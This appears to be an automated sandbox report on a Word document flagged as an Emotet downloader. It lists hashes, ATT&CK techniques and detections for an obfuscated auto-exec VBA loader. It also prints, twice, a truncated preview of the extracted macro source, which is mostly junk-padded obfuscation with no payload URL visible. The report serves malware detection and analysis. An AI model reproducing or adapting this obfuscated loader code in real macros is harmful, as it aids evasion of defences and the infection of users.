Emotet Office (OLE) malware analysis — malicious · 57f050a32c6ebd5e

MALICIOUS

Office (OLE)

244.5 KB Created: 2019-10-09 16:49:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: 370d128d3cec8248c6ad15a1bc3edd00 SHA-1: 7abf63cc726d9ae157f311e96ff9f9234d3dd2db SHA-256: 57f050a32c6ebd5ee2dfc81069588a910df9917b9770db07d84b5242629fa012

302 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information T1204.002 Malicious File

The file contains heavily obfuscated VBA macros, including an auto-exec loader that uses CreateObject and execution sinks, indicative of Emotet. The ClamAV signature also explicitly identifies it as Emotet. The primary function appears to be downloading and executing a secondary payload, a common Emotet behavior.

Heuristics 9

ClamAV: Doc.Downloader.Emotet-7331197-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7331197-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 159532 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	159532 bytes
SHA-256: `c0b0c9b92ef79bea577bbd61f62cdb0498a697ed356c8600422fc06e8cdfa860`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "x80b04086030" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "x00b00bb2429, 0, 0, MSForms, TextBox" Attribute VB_Control = "xb43014b0x8c1, 1, 1, MSForms, TextBox" Attribute VB_Control = "x0027x03bcb, 2, 2, MSForms, TextBox" Attribute VB_Control = "b5312x30596, 3, 3, MSForms, TextBox" Attribute VB_Control = "xb2c5x600x7, 4, 4, MSForms, TextBox" Attribute VB_Control = "c731c3202bx9, 5, 5, MSForms, TextBox" Attribute VB_Name = "c507x958056" Function b0x27x00x02() On Error Resume Next 'District97360 Larson Fords, West Wilbertstad, Pakistan Internal79165 Mitchell Overpass, Port Buckfort, Mexico b420940001505 = False 'Direct3483 Farrell Branch, Grahamtown, Dominica Dynamic0128 Kozey Tunnel, Cartwrightview, Suriname Select Case x49c3200800b 'Dynamic073 Roy Meadow, Irmafort, Trinidad and Tobago Dynamic84559 Kessler Unions, Tristianmouth, Uruguay Case c50b4453771x2 'Product80564 Kaleb Mill, Carolview, Russian Federation Principal9232 Jacobson Knolls, Gayleland, Cocos (Keeling) Islands 'Forward653 Christiansen Mill, West Reina, Peru International75409 Merle Canyon, South Emieport, Suriname b81635x22050 = False 'Human15509 Torphy Square, South Cliftonborough, Monaco Customer83363 Elsa Street, Vickiefort, Mongolia c0230b960b0b = x02005b387149 'Dynamic1898 Fidel Gateway, Lake Mario, British Indian Ocean Territory (Chagos Archipelago) Dynamic80250 Hilll Neck, Lake Elroyburgh, Kiribati x07087009207 = CInt(x025113650c67 - CByte(x73707cc12c3b)) 'Dynamic879 Mylene Burgs, South Stanton, Greece District50852 Cordell Roads, Carrollfort, British Indian Ocean Territory (Chagos Archipelago) x0x660005029 = Cos(bc07c886x11x) 'Regional1902 Lindgren Locks, New Elissa, Lebanon Dynamic70855 Reynolds Trace, Hirthefort, Vietnam xx0200036b8 = False 'Central6863 Marilyne Islands, Fritschside, Albania Principal51839 Lauryn Curve, West Janick, Turkey c0770967c19 = Rnd(c600251095bx9) 'Future57361 Verna Pass, Gerholdport, Micronesia Internal457 Sammie Skyway, Ibrahimburgh, Syrian Arab Republic Case x80026094832b 'Future35899 Dallas Turnpike, West Amelia, Qatar Customer53536 Mariah Forge, Lake Darianaburgh, Nigeria cc3x03680c8 = b66cb926207 'Global173 Carroll Inlet, Port Alvinachester, Taiwan Customer516 Willms Greens, Mavisside, Palau c410cc49708 = CDbl(b00b083030bc1) 'Investor241 Hegmann Mills, Jordanestad, Dominica National677 Fritsch Meadows, South Alaynaburgh, Zimbabwe End Select 'Direct641 Roger Estate, Kirkfurt, Maldives District7912 Dietrich Curve, West Cordeliaburgh, Uruguay b730807c500 = False 'Internal10466 Blick Mills, South Shaniya, Equatorial Guinea Product3428 Emmerich Garden, Angustown, Bhutan 'Investor6305 Reichel Points, West Garricktown, Antigua and Barbuda Global17206 Roslyn Villages, Abelton, Palau c5059331580 = True 'Global05825 Schuppe Wall, Walkertown, Turkmenistan Chief30114 Moises Dale, Hintzfort, Armenia Select Case x0c2c4700010 'Direct14104 Allison Path, West Randalburgh, Vanuatu Dynamic5351 Orrin Estate, Port Reuben, Grenada Case cb170b9427020 'Senior759 Brown Tunnel, Lake Jerrell, British Indian Ocean Territory (Chagos Archipelago) Regional121 Cleveland Turnpike, New Dewayneshire, Bhutan 'Chief898 Dedric Pass, South Maximo, Hungary Dynamic020 Guy Gateway, Annaliseberg, Argentina bx662cc208653 = False 'Dynamic178 Bradtke Mountains, Boehmville, Liechtenstein Chief4596 Karlee Parks, North David, Virgin Islands, U.S. b9676c1b0889 = x06b02081078 'Human297 Rigoberto Valley, East Esperanzashire, Maldives Investor378 Sporer Turnpike, Abdielport, Saint Barthelemy c3747902920 = CInt(c8 ... (truncated)

SHA-256: c0b0c9b92ef79bea577bbd61f62cdb0498a697ed356c8600422fc06e8cdfa860

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "x80b04086030"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "x00b00bb2429, 0, 0, MSForms, TextBox"
Attribute VB_Control = "xb43014b0x8c1, 1, 1, MSForms, TextBox"
Attribute VB_Control = "x0027x03bcb, 2, 2, MSForms, TextBox"
Attribute VB_Control = "b5312x30596, 3, 3, MSForms, TextBox"
Attribute VB_Control = "xb2c5x600x7, 4, 4, MSForms, TextBox"
Attribute VB_Control = "c731c3202bx9, 5, 5, MSForms, TextBox"

Attribute VB_Name = "c507x958056"
Function b0x27x00x02()
On Error Resume Next
   'District97360 Larson Fords, West Wilbertstad, Pakistan Internal79165 Mitchell Overpass, Port Buckfort, Mexico
b420940001505 = False
'Direct3483 Farrell Branch, Grahamtown, Dominica Dynamic0128 Kozey Tunnel, Cartwrightview, Suriname
Select Case x49c3200800b
'Dynamic073 Roy Meadow, Irmafort, Trinidad and Tobago Dynamic84559 Kessler Unions, Tristianmouth, Uruguay
         Case c50b4453771x2
         'Product80564 Kaleb Mill, Carolview, Russian Federation Principal9232 Jacobson Knolls, Gayleland, Cocos (Keeling) Islands
         'Forward653 Christiansen Mill, West Reina, Peru International75409 Merle Canyon, South Emieport, Suriname
b81635x22050 = False
'Human15509 Torphy Square, South Cliftonborough, Monaco Customer83363 Elsa Street, Vickiefort, Mongolia
            c0230b960b0b = x02005b387149
            'Dynamic1898 Fidel Gateway, Lake Mario, British Indian Ocean Territory (Chagos Archipelago) Dynamic80250 Hilll Neck, Lake Elroyburgh, Kiribati
            x07087009207 = CInt(x025113650c67 - CByte(x73707cc12c3b))
            'Dynamic879 Mylene Burgs, South Stanton, Greece District50852 Cordell Roads, Carrollfort, British Indian Ocean Territory (Chagos Archipelago)
            x0x660005029 = Cos(bc07c886x11x)
'Regional1902 Lindgren Locks, New Elissa, Lebanon Dynamic70855 Reynolds Trace, Hirthefort, Vietnam
xx0200036b8 = False
'Central6863 Marilyne Islands, Fritschside, Albania Principal51839 Lauryn Curve, West Janick, Turkey
            c0770967c19 = Rnd(c600251095bx9)
            'Future57361 Verna Pass, Gerholdport, Micronesia Internal457 Sammie Skyway, Ibrahimburgh, Syrian Arab Republic
         Case x80026094832b
         'Future35899 Dallas Turnpike, West Amelia, Qatar Customer53536 Mariah Forge, Lake Darianaburgh, Nigeria
            cc3x03680c8 = b66cb926207
            'Global173 Carroll Inlet, Port Alvinachester, Taiwan Customer516 Willms Greens, Mavisside, Palau
            c410cc49708 = CDbl(b00b083030bc1)
            'Investor241 Hegmann Mills, Jordanestad, Dominica National677 Fritsch Meadows, South Alaynaburgh, Zimbabwe
End Select
'Direct641 Roger Estate, Kirkfurt, Maldives District7912 Dietrich Curve, West Cordeliaburgh, Uruguay
b730807c500 = False
'Internal10466 Blick Mills, South Shaniya, Equatorial Guinea Product3428 Emmerich Garden, Angustown, Bhutan
   'Investor6305 Reichel Points, West Garricktown, Antigua and Barbuda Global17206 Roslyn Villages, Abelton, Palau
c5059331580 = True
'Global05825 Schuppe Wall, Walkertown, Turkmenistan Chief30114 Moises Dale, Hintzfort, Armenia
Select Case x0c2c4700010
'Direct14104 Allison Path, West Randalburgh, Vanuatu Dynamic5351 Orrin Estate, Port Reuben, Grenada
         Case cb170b9427020
         'Senior759 Brown Tunnel, Lake Jerrell, British Indian Ocean Territory (Chagos Archipelago) Regional121 Cleveland Turnpike, New Dewayneshire, Bhutan
         'Chief898 Dedric Pass, South Maximo, Hungary Dynamic020 Guy Gateway, Annaliseberg, Argentina
bx662cc208653 = False
'Dynamic178 Bradtke Mountains, Boehmville, Liechtenstein Chief4596 Karlee Parks, North David, Virgin Islands, U.S.
            b9676c1b0889 = x06b02081078
            'Human297 Rigoberto Valley, East Esperanzashire, Maldives Investor378 Sporer Turnpike, Abdielport, Saint Barthelemy
            c3747902920 = CInt(c8
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.